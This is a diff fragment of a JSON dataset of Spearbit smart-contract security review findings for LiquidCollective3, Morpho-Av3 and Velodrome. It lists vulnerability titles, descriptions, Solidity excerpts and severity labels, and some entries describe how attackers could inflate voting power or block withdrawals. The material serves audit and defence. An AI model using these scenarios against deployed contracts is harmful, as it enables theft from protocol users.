"html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "reportWithdraw and then burns the corresponding shares for the RedeemManager The current implementation of _reportWithdrawToRedeemManager calls RedeemManager's // perform a report withdraw call to the redeem manager redeemManager_.reportWithdraw{value: suppliedRedeemManagerDemandInEth}(suppliedRedeemManagerDemand); // we burn the shares of the redeem manager associated with the amount of eth provided _burnRawShares(address(RedeemManagerAddress.get()), suppliedRedeemManagerDemand);", + "title": "WETHGateway does not validate the constructor's input parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The current implementation of the WETHGateway contracts does not validate the user's parameters during the constructor. In this specific case, the constructor should revert if morpho address is equal to ad- dress(0).", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "OracleManager allows reporting for the same epoch multiple times, leading to unknown behavior.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Currently, it is possible for the oracle to report on the same epoch multiple times, because _- isValidEpoch checks that the report's epoch >= LastConsensusLayerReport.get().epoch. This can lead the contract to unspecified behavior The code will revert if the report increases the balance, not with an explicit check but reverting due to a subtraction underflow, since maxIncrease == 0 and Allowing other code paths to execute to completion.", + "title": "Missing/wrong natspec, typos, minor refactors and renaming of variables to be more meaningful", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "In general, the current codebase does not cover all the functions, events, structs, or state variables with proper natspec. Below you can find a list of small specific improvements regarding typos, missing/wrong natspec, or suggestions to rename variables to a more meaningful/correct name RewardsManager.sol#L28: consider renaming the balance variable in UserAssetBalance to scaledBalance PositionsManagerInternal.sol#L289-L297, PositionsManagerInternal.sol#L352-L362: consider better docu- menting this part of the code because at first sight it's not crystal clear why the code is structured in this way. For more context, see the PR comment in the spearbit audit repo linked to it. 22 MorphoInternal.sol#L469-L521: consider moving the _calculateAmountToSeize function from MorphoInt- ernal to PositionsManagerInternal contract. This function is only used internally by the PositionsMan- agerInternal. Note that there could be more instances of these kinds of \"refactoring\" of the code inside other contracts.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Missing event emit when user calls deposit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Whenever BalanceToDeposit is updated, the protocol should emit a SetBalanceToDeposit, but when a user calls UserDepositManager.deposit, the event is never emitted which could break tooling.", + "title": "No validation checks on the newDefaultIterations struct", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The initialize function takes in a newDefaultIterations struct and does not perform validation for any of its fields.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Reset the report data and increment the last epoch id before calling River's setConsensusLayerData when a quorum is made", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The current implementation of reportConsensusLayerData calls river.setConsensusLayerData(report) first when a quorum is made then resets the report variant and position data and also it increment the last epoch id afterward // if adding this vote reaches quorum if (variantVotes + 1 >= quorum) { // we push the report to river river.setConsensusLayerData(report); // we clear the reporting data _clearReports(); // we increment the lastReportedEpoch to force reports to be on the last frame LastEpochId.set(lastReportedEpochValue + 1); emit SetLastReportedEpoch(lastReportedEpochValue + 1); } In the future version of the protocol there might be a possibility for an oracle member to call back into reportCon- sensusLayerData when river.setConsensusLayerData(report) is called and so it would open a reentrancy for compromised/malicious oracle members.", + "title": "No validation check for newPositionsManager address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The initialize function does not ensure that the newPositionsManager is not a 0 address.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Update BufferedExceedingEth before calling sendRedeemManagerExceedingFunds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "In pullExceedingEth , River's sendRedeemManagerExceedingFunds is called before updating the RedeemManager's BufferedExceedingEth storage value _river().sendRedeemManagerExceedingFunds{value: amountToSend}(); BufferedExceedingEth.set(BufferedExceedingEth.get() - amountToSend);", + "title": "Missing Natspec function documentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The repayLogic function currently has Natspec documentation for every function argument except for the repayer argument.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Any oracle member can censor almost quorum report variants by resetting its address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The admin or an oracle member can DoS or censor almost quorum reports by calling setMember endpoint which would reset the report variants and report positions. The admin also can reset the/clear the reports by calling other endpoints by that should be less of an issue compared to just an oracle member doing that.", + "title": "approveManagerWithSig user experience could be improved", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "With the current implementation of the approveManagerWithSig signers must wait that the previous signers have consumed the nonce to be able to call approveManagerWithSig. Inside the function, there's a specific check that will revert if the signature has been signed with a nonce that is not equal to the current one assigned to the delegator, this means that signatures that use \"future\" nonce will not be able to be approved until previous nonce has been consumed. uint256 usedNonce = _userNonce[signatory]++; if (nonce != usedNonce) revert Errors.InvalidNonce(); Let's make an example: delegator want to allow 2 managers via signature 1) Generate sig_0 for manager1 with nonce_0. 2) Generate sig_1 for manager2 with nonce_1. 3) If no-one executes approveManagerWithSig(sig_0) the sig_1 (and all the signatures based on incremented nonces) cannot be executed. It's true that at some point someone/the signer will execute it.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Incentive mechanism that encourages operators to respond quickly to exit requests might diminish under certain condition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "/// @notice Retrieve all the active and fundable operators /// @dev This method will return a memory array of length equal to the number of operator, but /// @dev populated up to the fundable operator count, also returned by the method /// @return The list of active and fundable operators /// @return The count of active and fundable operators function getAllFundable() internal view returns (CachedOperator[] memory, uint256) { // uint32[] storage stoppedValidatorCounts = getStoppedValidators(); for (uint256 idx = 0; idx < operatorCount;) { _hasFundableKeys(r.value[idx]) && _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits only @audit-ok File: Operators.2.sol 153: 154: ,! 155: 156: 157: 158: ,! ..SNIP.. 172: 173: 174: 175: 176: 177: ,! 178: if ( ) { r.value[idx].requestedExits is the accumulative number of requested validator exits by the protocol _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) function is a value reported by oracle members which consist of both exited and slashed validator counts It was understood the rationale of having the _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits conditional check at Line 177 above is to incentivize operators to re- In other words, an operator with a re- spond quickly to exit requests if they want new stakes from deposits. questedExits value larger than the _getStoppedValidatorCountAtIndex count indicates that an operator did not submit exit requests to the Consensus Layer (CL) in a timely manner or the exit requests have not been finalized in CL. However, it was observed that the incentive mechanism might not work as expected in some instances. Consider the following scenario: Assuming an operator called A has 5 slashed validators and 0 exited validators, the _getStoppedValidator- CountAtIndex function will return 5 for A since this function takes into consideration both stopped and slashed validators. Also, assume that the requestedExits of A is 5, which means that A has been instructed by the protocol to submit 5 exit requests to CL. In this case, the incentive mechanism seems to diminish as A will still be considered a fundable operator even if A does not respond to exit requests since the number of slashed validators is enough to \"help\" to push up the stopped validator count to satisfy the condition, giving the wrong impression that A has already submitted the exit requests. As such, A will continue to be selected to stake new deposits.", + "title": "Missing user markets check when liquidating", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "The liquidation does not check if the user who gets liquidated actually joined the collateral and borrow markets.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "RedeemManager. _claimRedeemRequests transaction sender might be tricked to pay more eth in trans- action fees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The _claimRedeemRequests function is designed to allow anyone to claim ETH on behalf of another party who has a valid redeem request. The function iterates through the redeemRequestIds list and fulfills each request individually. However, it is important to note that the transfer of ETH to the recipients is only limited by the 63/64 rule, which means that it is possible for a recipient to take advantage of a heavy fallback function and potentially cause the sender to pay a significant amount of unwanted transaction fees.", + "title": "Consider reverting instead of returning zero inside repayLogic, withdrawLogic, withdrawCollater- alLogic and liquidateLogic function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Position manager always checks the user inputs via different validation functions. One of the vali- dations is that the input's amount must be greater than zero, otherwise, the transaction reverts with revert Er- rors.AmountIsZero(). The same behavior is not followed in those cases where the re-calculated amount is still zero. For example, in repayLogic after re-calculating the max amount that can be repaid by executing amount = Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount); In this case, Morpho simply executes if (amount == 0) return 0; Note that liquidateLogic should be handled differently because both the borrow amount and/or the collateral amount could be equal to zero. In this case, it would be better to revert with a different custom error based on which of the two amounts are equal to zero.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Claimable LsETH on the Withdraw Stack could exceed total LsETH requested on the Redeem Queue", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Let the total amount of claimable LsETH on the Withdraw Stack be x and the total amount of LsETH requested on the Redeem Queue be y. The following points are extracted from the Withdrawals Smart Contract Architecture documentation: The design ensures that x <= y . Refer to page 15 of the documentation. It is impossible for a redeem request to be claimed before at least one Oracle report has occurred, so it is impossible to skip a slashing time penalty. Refer to page 16 of the documentation. Based on the above information, the main purpose of the design (x <= y) is to avoid favorable treatment of LsETH holders that would request a redemption before others following a slashing incident. However, this constraint (x <= y ) is not being enforced in the contract. The reporter could continue to report withdrawal via the RedeemManager.reportWithdraw function till the point x > y. If x > y, LsETH holders could request a redemption before others following a slashing incident to gain an advan- tage.", + "title": "PERMIT2 operations like transferFrom2 and simplePermit2 will revert if amount is greater than type(uint160).max", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Both Morpho.sol and PositionsManager.sol uses the Permit2 lib. The current implementation of the permit2 lib explicitly restricts the amount of token to uint160 by calling amount.toUint160() On Morpho, the amount is expressed as a uint256 and the user could, in theory, pass an amount that is greater than type(uint160).max. By doing so, the transaction would revert when it interacts with the permit2 lib.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "An oracle member can resubmit data for the same epoch multiple times if the quorum is set to 1", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "If the quorum is set to 1 and the difference between the report's epoch e and LastEpochId.get() is (cid:1)e, an oracle member will be able to call reportConsensusLayerData (cid:1)e + 1 times to push its report for epoch e to the protocol and with different data each time (only restriction on successive reports is that the difference of underlying balance between reports would need to be negative since the maxIncrease will be 0). Note that in reportConsensusLayerData the first storage write to LastEpochId will be overwritten later due to quorum of one: x = LastEpochId -> report.epoch -> x + 1", + "title": "Both _wrapETH and _unwrapAndTransferETH do not check if the amount is zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Both _wrapETH and _unwrapAndTransferETH are not checking if the amount amount of tokens is greater than zero. If the amount is equal to zero, Morpho should avoid making the external call or simply revert.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "Report's validatorsCount's historical non-decreseness does not get checked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Once the Oracle members come to a quorum for a selected report variant, the validators count is stored in the storage. Note that validatorsCount is supposed to represent the total cumulative number of validators ever funded on consensus layer (even if they have been slashed or exited at some point ). So this value is supposed to be a non-decreasing function of reported epochs. But this invariant has never been checked in setConsensusLayerData.", + "title": "Document further contraints on BucketDLL's insert and remove functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", + "body": "Besides the constraint that id may not be zero, there are further constraints that are required for the insert and remove functions to work correctly: insert: \"This function should not be called with an _id that is already in the list.\" Otherwise, it would overwrite the existing _id. remove: \"This function should not be called with an _id that is not in the list.\" Otherwise, it would set all of _list.accounts[0] to address(0), i.e., mark the list as empty.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Morpho-Av3", + "Severity: Informational" ] }, { - "title": "The report's slashingContainmentMode and bufferRebalancingMode are decided by the oracle mem- bers which affects the exiting strategy of validators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The current protocol leaves it up to the oracle members to come to a quorum to set either of the report.slashingContainmentMode or report.bufferRebalancingMode to true or false. That means the oracle members have the power to decide off-chain whether validators should be exited and whether some of the deposit balance should be reallocated for redeeming (vs an algorithmic decision by the protocol on-chain). A potential bad scenario would be oracle members deciding to not signal for new validators to exit and from the time for the current epoch to the next report some validators get penalized or slashed which would reduce the If those validators would have exited before getting slashed or penalized, the underlying value of the shares. redeemers would have received more ETH back for their investment.", + "title": "Reward calculates earned incorrectly on each epoch boundary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Rewards are allocated on a per epoch basis to users in proportion to their total deposited amount. Because the balance and total supply used for rewards is based on _currTs % WEEK + WEEK, the values will not represent the end of the current epoch, but instead the first second of the next epoch. As a result, if a user deposits at any epoch boundary, their deposited amount will actually contribute to the check- pointed total supply of the prior epoch. This leads to a few issues which are detailed below: Users who deposit in the first second of the next epoch will dilute the total supply for the prior epoch while not being eligible to claim rewards for that same epoch. Consequently, some rewards will be left unclaimed and locked within the contract as the tokenRewardsPerEpoch mapping is used to store reward amounts so unclaimed rewards will not roll over to future epochs. Users can also avoid zero numEpochs by depositing a negligible amount at an earlier epoch for multiple ac- counts before attempting to deposit a larger amount at _currTs % WEEK == 0. The same user can withdraw their deposit from the VotingEscrow contract with the claimed rewards and re-deposit these funds into an- other account in the same block. They are able to abuse this issue to claim all rewards allocated to each epoch. In a similar fashion, reward distributions that are weighted by users' votes in the Voter contract can suffer the same issue as outlined above. If the attacker votes some negligible amount on various pools using several accounts, they can increase the vote, claim, reset the vote and re-vote via another account to claim rewards multiple times. The math below shows that _currTs + WEEK is indeed the first second of the next epoch and not the last of the prior epoch. 6 uint256 internal constant WEEK = 7 days; function epochStart(uint256 timestamp) internal pure returns (uint256) { return timestamp - (timestamp % WEEK); } epochStart(123) Type: uint Hex: 0x0 Decimal: 0 epochStart(100000000) Type: uint Hex: 0x5f2b480 Decimal: 99792000 WEEK Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(1 + WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(0 + WEEK) Type: uint Hex: 0x93a80 Decimal: 604800 epochStart(WEEK - 1) Type: uint Hex: 0x0 Decimal: 0", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Velodrome", + "Severity: Critical Risk" ] }, { - "title": "Anyone can call depositToConsensusLayer and potentially push wrong data on-chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "Anyone can call depositToConsensusLayer and potentially push wrong data on-chain. An example is when an operator would want to remove a validator key that is not-funded yet but has an index below the operator limit and will be picked by the strategy if depositToConsensusLayer is called. Then anyone can front run the removal call by the operator and force push this validator's info to the deposit contract.", + "title": "DOS attack by delegating tokens at MAX_DELEGATES = 1024", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Any user can delegate the balance of the locked NFT amount to anyone by calling delegate. As the delegated tokens are maintained in an array that's vulnerable to DOS attack, the VotingEscrowhas a safety check of MAX_DELEGATES = 1024 preventing an address from having a huge array. Given the current implementation, any user with 1024 delegated tokens takes approximately 23M gas to transfer/burn/mint a token. However, the current gas limit of the op chain is 15M. (ref: Op-scan) The current votingEscrow has a limit of MAX_DELEGATES=1024. it's approx 23M to transfer/withdraw a token when there are 1024 delegated voting on a token. It's cheaper to delegate from an address with a shorter token list to an address with a longer token list. => If someone trying to attack a victim's address by creating a new address, a new lock, and delegating to the victim. By the time the attacker hit the gas limit, the victim can not withdraw/transfer/delegate.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Low Risk" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Calculation of currentMaxCommittableAmount can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "currentMaxCommittableAmount is calculated as: // we adapt the value for the reporting period by using the asset balance as upper bound uint256 underlyingAssetBalance = _assetBalance(); uint256 currentBalanceToDeposit = BalanceToDeposit.get(); ... uint256 currentMaxCommittableAmount = LibUint256.min( LibUint256.min(underlyingAssetBalance, (currentMaxDailyCommittableAmount * period) / 1 days), currentBalanceToDeposit ); But underlyingAssetBalance is Bu = Bv +Bd +Bc +Br +32(Cd (cid:0)Cr ) which is greater than currentBalanceToDeposit Bd since the other components are non-negative values. parameter description Bv Bd Bc Br Cd Cr M m Bu LastConsensusLayerReport.get().validatorsBalance BalanceToDeposit.get() CommittedBalance.get() BalanceToRedeem.get() DepositedValidatorCount.get() LastConsensusLayerReport.get().validatorsCount currentMaxCommittableAmount currentMaxDailyCommittableAmount * period) / 1 days underlyingAssetBalance Note that the fact that Cd (cid:21) Cr is an invariant that is enforced by the protocol. and so currently we are computing M as: M = min(Bu, Bd , m) = min(Bd , m) since Bu (cid:21) Bd .", + "title": "Inflated voting balance due to duplicated veNFTs within a checkpoint", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Note: This issue affects VotingEscrow._moveTokenDelegates and VotingEscrow._moveAllDele- gates functions A checkpoint can contain duplicated veNFTs (tokenIDs) under certain circumstances leading to double counting of voting balance. Malicious users could exploit this vulnerability to inflate the voting balance of their accounts and participate in governance and gauge weight voting, potentially causing loss of assets or rewards for other users if the inflated voting balance is used in a malicious manner (e.g. redirect rewards to gauges where attackers have a vested interest). Following is the high-level pseudo-code of the existing _moveTokenDelegates function, which is crucial for under- standing the issue. 1. Assuming moving tokenID=888 from Alice to Bob. 2. Source Code Logic (Moving tokenID=888 out of Alice) Fetch the existing Alice's token IDs and assign them to srcRepOld Create a new empty array = srcRepNew Copy all the token IDs in srcRepOld to srcRepNew except for tokenID=888 3. Destination Code Logic (Moving tokenID=888 into Bob) Fetch the existing Bobs' token IDs and assign them to dstRepOld Create a new empty array = dstRepNew Copy all the token IDs in dstRepOld to dstRepNew Copy tokenID=888 to dstRepNew The existing logic works fine as long as a new empty array (srcRepNew OR dstRepNew) is created every single time. The code relies on the _findWhatCheckpointToWrite function to return the index of a new checkpoint. function _moveTokenDelegates( ..SNIP.. uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; However, the problem is that the _findWhatCheckpointToWrite function does not always return the index of a new checkpoint (Refer to Line 1357 below). It will return the last checkpoint if it has already been written once within the same block. function _findWhatCheckpointToWrite(address account) internal view returns (uint32) { uint256 _blockNumber = block.number; uint32 _nCheckPoints = numCheckpoints[account]; if (_nCheckPoints > 0 && _checkpoints[account][_nCheckPoints - 1].fromBlock == _blockNumber) { return _nCheckPoints - 1; } else { return _nCheckPoints; } } If someone triggers the _moveTokenDelegates more than once within the same block (e.g. perform NFT transfer twice to the same person), the _findWhatCheckpointToWrite function will return a new checkpoint in the first transfer but will return the last/previous checkpoint in the second transfer. This will cause the move token delegate logic to be off during the second transfer. 9 First Transfer at Block 1000 Assume the following states: numCheckpoints[Alice] = 1 _checkpoints[Alice][0].tokenIds = [n1, n2] <== Most recent checkpoint numCheckpoints[Bob] = 1 _checkpoints[Bob][0].tokenIds = [n3] <== Most recent checkpoint To move tokenID=2 from Alice to Bob, the _moveTokenDelegates(Alice, Bob, n2) function will be triggered. The _findWhatCheckpointToWrite will return the index of 1 which points to a new array. The end states of the first transfer will be as follows: numCheckpoints[Alice] = 2 _checkpoints[Alice][0].tokenIds = [n1, n2] _checkpoints[Alice][1].tokenIds = [n1] <== Most recent checkpoint numCheckpoints[Bob] = 2 _checkpoints[Bob][0].tokenIds = [n3] _checkpoints[Bob][1].tokenIds = [n2, n3] <== Most recent checkpoint Everything is working fine at this point in time. Second Transfer at Block 1000 (same block) To move tokenID=1 from Alice to Bob, the _moveTokenDelegates(Alice, Bob, n1) function will be triggered. This time round since the last checkpoint block is the same as the current block, the _findWhatCheckpointToWrite function will return the last checkpoint instead of a new checkpoint. The srcRepNew and dstRepNew will end up referencing the old checkpoint instead of a new checkpoint. As such, the srcRepNew and dstRepNew array will reference back to the old checkpoint _checkpoints[Alice][1].tokenIds and _checkpoints[Bob][1].tokenIds respectively. The end state of the second transfer will be as follows: numCheckpoints[Alice] = 3 _checkpoints[Alice][0].tokenIds = [n1, n2] _checkpoints[Alice][1].tokenIds = [n1] <== Most recent checkpoint numCheckpoints[Bob] = 3 _checkpoints[Bob][0].tokenIds = [n3] _checkpoints[Bob][1].tokenIds = [n2, n3, n2, n3, n1] <== Most recent checkpoint Four (4) problems could be observed from the end state: 1. The numCheckpoints is incorrect. Should be two (2) instead to three (3) 2. TokenID=1 has been added to Bob's Checkpoint, but it has not been removed from Alice's Checkpoint 3. Bob's Checkpoint contains duplicated tokenIDs (e.g. there are two TokenID=2 and TokenID=3) 4. TokenID is not unique (e.g. TokenID appears more than once) Since the token IDs within the checkpoint will be used to determine the voting power, the voting power will be inflated in this case as there will be a double count of certain NFTs. function _moveTokenDelegates( ..SNIP.. uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; 10 Additional Comment about nextSrcRepNum variable and _findWhatCheckpointToWrite function In Line 1320 below, the code wrongly assumes that the _findWhatCheckpointToWrite function will always return the index of the next new checkpoint. The _findWhatCheckpointToWrite function will return the index of the latest checkpoint instead of a new one if block.number == checkpoint.fromBlock. function _moveTokenDelegates( address srcRep, address dstRep, uint256 _tokenId ) internal { if (srcRep != dstRep && _tokenId > 0) { if (srcRep != address(0)) { uint32 srcRepNum = numCheckpoints[srcRep]; uint256[] storage srcRepOld = srcRepNum > 0 ? _checkpoints[srcRep][srcRepNum - 1].tokenIds : _checkpoints[srcRep][0].tokenIds; uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; Additional Comment about numCheckpoints In Line 1330 below, the function computes the new number of checkpoints by incrementing the srcRepNum by one. However, this is incorrect because if block.number == checkpoint.fromBlock, then the number of checkpoints remains the same and does not increment. function _moveTokenDelegates( address srcRep, address dstRep, uint256 _tokenId ) internal { if (srcRep != dstRep && _tokenId > 0) { if (srcRep != address(0)) { uint32 srcRepNum = numCheckpoints[srcRep]; uint256[] storage srcRepOld = srcRepNum > 0 ? _checkpoints[srcRep][srcRepNum - 1].tokenIds : _checkpoints[srcRep][0].tokenIds; uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep); uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds; // All the same except _tokenId for (uint256 i = 0; i < srcRepOld.length; i++) { uint256 tId = srcRepOld[i]; if (tId != _tokenId) { srcRepNew.push(tId); } } numCheckpoints[srcRep] = srcRepNum + 1; }", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Remove redundant array length check and variable to save gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "When someone calls ConsensusLayerDepositManager.depositToConsensusLayer, the contract will verify that the receivedSignatureCount matches the receivedPublicKeyCount returned from _getNextVal- idators. This is unnecessary as the code always creates them with the same length.", + "title": "Rebase rewards cannot be claimed after a veNFT expires", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Note: This issue affects both the RewardsDistributor.claim and RewardsDistributor.claimMany functions A user will claim their rebase rewards via the RewardsDistributor.claim function, which will trigger the VotingE- scrow.deposit_for function. function claim(uint256 _tokenId) external returns (uint256) { if (block.timestamp >= timeCursor) _checkpointTotalSupply(); uint256 _lastTokenTime = lastTokenTime; _lastTokenTime = (_lastTokenTime / WEEK) * WEEK; uint256 amount = _claim(_tokenId, _lastTokenTime); if (amount != 0) { IVotingEscrow(ve).depositFor(_tokenId, amount); tokenLastBalance -= amount; } return amount; } Within the VotingEscrow.deposit_for function, the require statement at line 812 below will verify that the veNFT performing the claim has not expired yet. function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant { LockedBalance memory oldLocked = _locked[_tokenId]; require(_value > 0, \"VotingEscrow: zero amount\"); require(oldLocked.amount > 0, \"VotingEscrow: no existing lock found\"); require(oldLocked.end > block.timestamp, \"VotingEscrow: cannot add to expired lock, withdraw\"); _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE); } If a user claims the rebase rewards after their veNFT's lock has expired, the VotingEscrow.depositFor function will always revert. As a result, the accumulated rebase rewards will be stuck in the RewardsDistributor contract and users will not be able to retrieve them.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Duplicated events emitted in River and RedeemManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The amount of ETH pulled from the redeem contract when setConsensusData is called by the oracle is notified with events in both RedeemManager and River contracts.", + "title": "Claimed rebase rewards of managed NFT are not compounded within LockedManagedReward", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Rebase rewards of a managed NFT should be compounded within the LockedManagedRewards contract. However, this was not currently implemented. When someone calls the RewardsDistributor.claim with a managed NFT, the claimed rebase rewards will be locked via the VotingEscrow.depositFor function (Refer the VotingEscrow.depositFor function fails to notify the LockedManagedRewards contract of the incoming rewards. Thus, the rewards do not accrue in the LockedManagedRewards. to Line 277 below). However, function claim(uint256 _tokenId) external returns (uint256) { if (block.timestamp >= timeCursor) _checkpointTotalSupply(); uint256 _lastTokenTime = lastTokenTime; _lastTokenTime = (_lastTokenTime / WEEK) * WEEK; uint256 amount = _claim(_tokenId, _lastTokenTime); if (amount != 0) { IVotingEscrow(ve).depositFor(_tokenId, amount); tokenLastBalance -= amount; } return amount; } One of the purposes of the LockedManagedRewards contract is to accrue rebase rewards claimed by the man- aged NFT so that the users will receive their pro-rata portion of the rebase rewards based on their contribu- tion to the managed NFT when they withdraw their normal NFTs from the managed NFT via the VotingE- scrow.withdrawManaged function. 13 /// @inheritdoc IVotingEscrow function withdrawManaged(uint256 _tokenId) external nonReentrant { ..SNIP.. uint256 _reward = IReward(_lockedManagedReward).earned(address(token), _tokenId); ..SNIP.. // claim locked rewards (rebases + compounded reward) address[] memory rewards = new address[](1); rewards[0] = address(token); IReward(_lockedManagedReward).getReward(_tokenId, rewards); If the rebase rewards are not accrued in the LockedManagedRewards, users will not receive their pro-rata portion of the rebase rewards during withdrawal.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Gas Optimization" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "totalRequestedExitsValue's calculation can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "In the for loop in this context, totalRequestedExitsValue is updated for every operator that sat- isfies _getActiveValidatorCountForExitRequests(operators[idx]) == highestActiveCount. Based on the used increments, their sum equals to optimalTotalDispatchCount.", + "title": "Malicious users could deposit normal NFTs to a managed NFT on behalf of others without their permission", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The VotingEscrow.depositManaged function did not verify that the caller (msg.sender) is the owner of the _tokenId. As a result, a malicious user can deposit normal NFTs to a managed NFT on behalf of others without their permission. function depositManaged(uint256 _tokenId, uint256 _mTokenId) external nonReentrant { require(escrowType[_mTokenId] == EscrowType.MANAGED, \"VotingEscrow: can only deposit into managed nft\"); ,! require(!deactivated[_mTokenId], \"VotingEscrow: inactive managed nft\"); 